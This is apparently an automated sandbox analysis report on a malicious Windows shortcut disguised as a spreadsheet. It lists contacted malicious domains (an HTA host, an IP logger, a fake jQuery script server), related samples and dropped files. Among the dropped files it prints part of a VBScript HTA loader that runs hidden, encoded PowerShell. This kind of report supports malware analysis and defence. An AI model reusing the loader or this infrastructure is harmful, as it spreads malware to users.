http://code.jquery.com/	powershell.exe, powershell.exe, 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1389805083.000000000783A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ecols.ru/ecols.hta...4	mshta.exe, 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 00000003.00000002.2068241616.000001E1D8880000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000006.00000002.1382248319.0000000005BA9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.5.dr	false		high
https://iplogger.cn/	mshta.exe, 00000002.00000002.2087019154.000001B148900000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078490513.000001B1488F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2085620199.000001B1488FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2077055407.000001B1488FF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://g.live.com/odclientsettings/Prod.C:	edb.log.5.dr	false		high
https://g.live.com/odclientsettings/ProdV2	edb.log.5.dr	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000006.00000002.1370317295.0000000004B41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.cn/forensicsas.pngD	mshta.exe, 00000002.00000002.2086880000.000001B1488A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://iplogger.cn/forensicsas.pngS_BROWSER_APP_	mshta.exe, 00000002.00000002.2087288383.000001B148BF0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://contoso.com/	powershell.exe, 00000006.00000002.1382248319.0000000005BA9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1175679720.00000205748CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1156807846.0000020566129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1175679720.0000020574A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2059208626.000001E1D0823000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2059208626.000001E1D06E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1382248319.0000000005BA9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000000.00000002.1156807846.0000020565CB8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ecols.ru/	mshta.exe, 00000002.00000003.1169238850.000001B14895C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ecols.ru/ecols.hta(	mshta.exe, 00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ecols.ru/ecols.hta	mshta.exe, 00000002.00000003.2078431282.000001B148956000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2080837703.000001B94BBC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078610955.000001B94BAD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2079247893.000001B94BB91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078853336.000001B94BB2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2079383275.000001B94BB94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2088137748.000001B94BBDB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.cn/forensicsas.png/	mshta.exe, 00000002.00000002.2086880000.000001B1488A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1156807846.0000020564851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2000051277.000001E1C0671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1370317295.0000000004B41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mcnn.ru:8443/jquery-3.3.1.slim.min.js:r	powershell.exe, 00000006.00000002.1368654410.0000000002D90000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000005.00000003.1211090216.0000020DBB842000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	false		high
https://iplogger.cn/forensicsas.png3	mshta.exe, 00000002.00000002.2086942294.000001B1488BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078490513.000001B1488BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2086121058.000001B1488BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://iplogger.cn/forensicsas.png31536000	mshta.exe, 00000002.00000003.1169238850.000001B14895C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ecols.ru/ecols.hta...	mshta.exe, 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ecols.ru/ecols.htaT	mshta.exe, 00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1175679720.00000205748CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1156807846.0000020566129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1175679720.0000020574A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2059208626.000001E1D0823000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2059208626.000001E1D06E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1382248319.0000000005BA9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000000.00000002.1156807846.0000020565CB8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ecols.ru/ecols.htaY	mshta.exe, 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2087103662.000001B148958000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078431282.000001B148956000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ecols.ru/ecols.htaX	mshta.exe, 00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1386504166.000000000715D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1386504166.000000000715D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mcnn.ru:8443/jquery-3.3.1.slim.min.js	powershell.exe, 00000006.00000002.1368654410.0000000002D90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1389805083.000000000783F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://go.micro	powershell.exe, 00000003.00000002.2000051277.000001E1C1878000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.cn/forensicsas.pngf	mshta.exe, 00000002.00000002.2086880000.000001B1488A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://mcnn.ru:8443/jquery-3.3.1.slim.min.js(r	powershell.exe, 00000006.00000002.1368654410.0000000002D90000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://iplogger.cn/forensicsas.pnge	mshta.exe, 00000002.00000002.2086880000.000001B148880000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ecols.ru/ecols.htaP	mshta.exe, 00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000006.00000002.1382248319.0000000005BA9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000005.00000002.2373086860.0000020DBBA8C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ecols.ru/ecols.htaD	mshta.exe, 00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mcnn.ru:8443/jquery-3.3.1.slim.min.js6V	powershell.exe, 00000006.00000002.1389805083.000000000783F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://iplogger.cn/~	mshta.exe, 00000002.00000002.2087019154.000001B148900000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078490513.000001B1488F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2085620199.000001B1488FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2077055407.000001B1488FF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ecols.ru/ecols.htaru/ecols.htaA	mshta.exe, 00000002.00000003.1169190097.000001B94B54A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1386504166.000000000715D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://iplogger.cn/forensicsas.pngX	mshta.exe, 00000002.00000002.2087634483.000001B94B510000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://iplogger.cn/forensicsas.png~	mshta.exe, 00000002.00000003.1169238850.000001B14895C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000005.00000003.1211090216.0000020DBB842000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.dr	false		high
http://ecols.ru/ecols.htaTKC:	mshta.exe, 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2087103662.000001B148958000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078431282.000001B148956000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mcnn.ru/	powershell.exe, 00000006.00000002.1386881963.00000000071C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1156807846.0000020564851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2000051277.000001E1C0671000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000000.00000002.1156807846.0000020565CB8000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.160.19	iplogger.cn	United States	13335	CLOUDFLARENETUS	true
91.218.228.26	ecols.ru	Russian Federation	203226	IHCRUInternet-HostingLtdMoscowRussiaRU	false
190.2.146.205	mcnn.ru	Curacao	49981	WORLDSTREAMNL	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1638546
Start date and time:	2025-03-14 14:20:18 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	____ ______.xls.lnk.bin.lnk
Detection:	MAL
Classification:	mal100.bank.troj.evad.winLNK@11/16@3/4
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 92% Number of executed functions: 18 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.199.214.10, 131.253.33.254, 4.175.87.197, 20.109.210.53
Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7288 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7540 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:21:13	API Interceptor	99359x Sleep call for process: powershell.exe modified
09:21:18	API Interceptor	2x Sleep call for process: svchost.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
IHCRUInternet-HostingLtdMoscowRussiaRU	f8PZ0Uuwau.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	217.144.98.170
	grxpiPs2Fw.elf	Get hash	malicious	Mirai, Moobot	Browse	91.218.228.164
	http://hotel-karmen.ru	Get hash	malicious	Unknown	Browse	37.143.13.155
	LockyRansom.exe	Get hash	malicious	Unknown	Browse	37.143.9.154
	LockyRansom.exe	Get hash	malicious	Unknown	Browse	37.143.9.154
	KtMg6d1Ivx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.87.199.107
	https://googleads.g.doubleclick.net/pcs/click?xai=AKAOjsuLaMSxRbnmx4CaSYBD7UEX1peDpNeYnMWW4dVza-G52TGjr2vj5pKsC0MnZ5wKKbv48DTu4_9zifCV__nn-40JMtKyE_J-VMT8wv7a1Lf0nNBgkN5ubnqB_fbDSNDoYvSXrEeZ7mt6jhn1Gl78NJ_xm24v553oIbpIcOlySTxRzwS3ROTWKkuLKGhJpg1kkeB-2p7L0D_C0Tx_5HYnjwuOs8n8jzqBq4O3iSh2WW3Es8m8o5Fm3xTlO9UbT5wj7XWQmwefhVbuqmrnfemDwqzjrWGaSNRRqB_R9QTXSQjdFDdWTx0_Oo7RzbAWcjKqQR2JbLAW_ZYkDd6cz8q8BYpJJzzkZ6QKuyXH_CCgkPoul09CafKLox9uieqQMwQ&sai=AMfl-YQSMSxmTEvfKP4k3QH0IYz2PIsK1wo62PVWE2-bo7ZdB4Yue3XhmrRw5NnkQ1uiDEixQcvMUgBuCbvmwfqOzcwUGUmidc9tgXXMjS8Z7zb-8rHzyMziFnJ7Kv7S6gwBuwmLhiK3qougMvlVE4DWmw&sig=Cg0ArKJSzCxoV_8QjjEU&fbs_aeid=%5Bgw_fbsaeid%5D&adurl=https://dubaieventhost.com?26utm_source%3Dacuityads%26utm_medium%3Ddisplay%26utm_campaign%3D23%26utm_content%3D728x90_CyberWeek%26utm_term%3DNOOFR%26dclid%3D%25edclid!	Get hash	malicious	Unknown	Browse	95.183.11.171
	xd.arm.elf	Get hash	malicious	Mirai	Browse	185.22.233.198
	epce3FXdZM.exe	Get hash	malicious	DCRat	Browse	217.144.103.11
	Wcu8q856Mc.elf	Get hash	malicious	Mirai	Browse	185.87.196.219
CLOUDFLARENETUS	ZEemZXPukh.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	http://allstareventsmiami.com	Get hash	malicious	Unknown	Browse	172.67.142.245
	SOA FEB 2025.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.96.1
	https://intimidadcondiosgt.com/fghjwssxhj/2pIU6hxd/Y2l0eXRpdGxlQGNpdHl0aXRsZWFnZW5jeS5jb20N	Get hash	malicious	Unknown	Browse	172.67.136.69
	Spacey Sun 11.12.411.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	https://www.google.co.zm/url?q=https%3A%2F%2Fembalagenspontual.com%2F.dnd%2F&sa=D&sntz=1&usg=AOvVaw2fQzlrSA6WjuVq4o5C-GZh#?470265860475745Family=X2NlYzY3QG5hc2hpbnRsLmNvbQ==	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.17.25.14
	https://fortuneurl.com/qdQgK	Get hash	malicious	Unknown	Browse	104.22.20.144
	13.03.2025-13.03.2025 shtml.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	http://188.114.96.0	Get hash	malicious	Unknown	Browse	104.18.31.19
	SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe	Get hash	malicious	ScreenConnect Tool	Browse	172.67.181.28
WORLDSTREAMNL	New-inst-x64.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	5.252.153.122
	https://accverst.com/	Get hash	malicious	Unknown	Browse	5.252.153.143
	Launcher.exe	Get hash	malicious	LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	5.252.153.122
	ntohlsakdth.exe	Get hash	malicious	DCRat	Browse	5.252.155.127
	Arly.exe	Get hash	malicious	Discord Token Stealer, PRYSMAX STEALER, RHADAMANTHYS, Xmrig	Browse	5.252.153.122
	jklarm5.elf	Get hash	malicious	Unknown	Browse	213.108.199.205
	HmngBpR.exe	Get hash	malicious	Unknown	Browse	185.183.32.103
	EDM8nAR.bat	Get hash	malicious	Unknown	Browse	5.252.155.19
	cTgYsJEANZ.exe	Get hash	malicious	Unknown	Browse	185.183.32.103
	ChromeSetup.exe	Get hash	malicious	Unknown	Browse	185.18.52.66

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	_________03M4138.docx.bin.doc	Get hash	malicious	Unknown	Browse	172.67.160.19
	Spacey Sun 11.12.411.exe	Get hash	malicious	Vidar	Browse	172.67.160.19
	Spacey Sun 11.12.411.exe	Get hash	malicious	Vidar	Browse	172.67.160.19
	PO0317011.exe	Get hash	malicious	Unknown	Browse	172.67.160.19
	Payment slip_pdf.pif.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.67.160.19
	Portals.exe	Get hash	malicious	Vidar	Browse	172.67.160.19
	Portals.exe	Get hash	malicious	Unknown	Browse	172.67.160.19
	test.lnk.download.lnk	Get hash	malicious	Unknown	Browse	172.67.160.19
	file.exe	Get hash	malicious	Remcos	Browse	172.67.160.19
	DropboxInstaller.exe	Get hash	malicious	Unknown	Browse	172.67.160.19

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073495993873034
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvri:KooCEYhgYEL0In
MD5:	954F01F35CCD88CEBBEC503801CC7B9B
SHA1:	8C6B02ABD2B11C17D70713BD268103CF6336AD7D
SHA-256:	911FD6588510E559DB41B22B9A285617B7438F883754881EE3501CD2ABC00B36
SHA-512:	EC3EC3F8BA08E24D041A60AD1EC31F085BAB6B15B4B1DE65BE8459033FCCE674B9A62C092BE821768F8E5D3D261ADF78BBB30D4515F0F9341DCEFFD6045F5267
Malicious:	false
Reputation:	low
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x070a28cf, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221520445916064
Encrypted:	false
SSDEEP:	1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO
MD5:	B23F1595402087088A73B6DF58E22A00
SHA1:	32412ED2537E4F1311DAA0DA8E00B975D4081204
SHA-256:	A868B5A02EE8B5AF6BEC404955C2FC1FB42FA035450A39450874D2624AC346D0
SHA-512:	6E134A422D7A6F3171AA916A034A34303FB915A0AF42529CA5FAE2B1DF17C10D3429E5CA58A57B69CDA70D593BE937229E66C281015726CE669B026685476E1D
Malicious:	false
Reputation:	low
Preview:	..(.... .......A.......X\...;...{......................0.!..........{A......}3.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................v.'.....}q...................R].....}S..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07748090357796628
Encrypted:	false
SSDEEP:	3:PYeBIilvjn13a/yd4ltallcVO/lnlZMxZNQl:PzBLv53qy2eOewk
MD5:	D28754438DB345743DB5A7475C678739
SHA1:	2F934E46B63521FE8904BA927920CC3408D78A92
SHA-256:	2FFE632A28ACAFFA0341F332B3A81D91E06F2E9630439DA8AF580ED6D2205374
SHA-512:	04511E3133F145D50BD531345ECBF7D05F37AC33D559136FF12F49591065E4C5D55711FD667773B27B05DCCD965409E369AC0D0B7E9773F3BB081ABA7FD5706A
Malicious:	false
Preview:	..._.....................................;...{.......}S......{A..............{A......{A..........{A]..................R].....}S.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ecols[1].hta

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	HTML document, ASCII text, with very long lines (7637)
Category:	dropped
Size (bytes):	7799
Entropy (8bit):	4.500285886794744
Encrypted:	false
SSDEEP:	192:WsVs2Ag8/AAg5iwKEtjge8U8EKdMz5A+ZxjKKwq:xseAWiBEtIU8EkKwq
MD5:	DCDC1BAD9FB1C049B7F28AFA7DC8712A
SHA1:	53CD3A94CFFD9C42711009CE71B3AAD7EAC03AA4
SHA-256:	57CD0102F13D317E70F7E91462D01B409146B42F4C8F929D14325AC5F91FF33E
SHA-512:	11E19ED89AA5723A377C0F4B9077E48A781BA6A6FF34D452CEDFF647FC9AD922BE993BB3466465E07177B7DCA6003AA0AC4979C782615B1947AE030560E6C7A7
Malicious:	true
Yara Hits:	Rule: WiltedTulip_WindowsTask, Description: Detects hack tool used in Operation Wilted Tulip - Windows Tasks, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ecols[1].hta, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	<script language="VBScript">..Function var_func()...Dim var_shell...Set var_shell = CreateObject("Wscript.Shell")...var_shell.run "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	10191
Entropy (8bit):	4.969827299917153
Encrypted:	false
SSDEEP:	192:Zxoe5qpOZxoe54ib43WzmVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9S:Srib43WKIkjh4iUxsMUpX6Ypib47
MD5:	8C799E302AF1736D2CF8D4D3F217E724
SHA1:	42B4C15E7608F2B4C3568DC6977C07EC2E3D4DEA
SHA-256:	DC3A5A2555A6877D960AF4E0E9B8F8D0329BC011B53872CCBEB2273B60493D44
SHA-512:	4A4469ECEF31BC56986AD2EDD1E2A0075AEE3A1FA5DF8093873F67D5F3418321E54A1752A9535BF8AAE3D24A78C93067E96DA073BCF6F3B019A74DFEE30B2088
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-ServerMode

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jmsghcu.4qh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
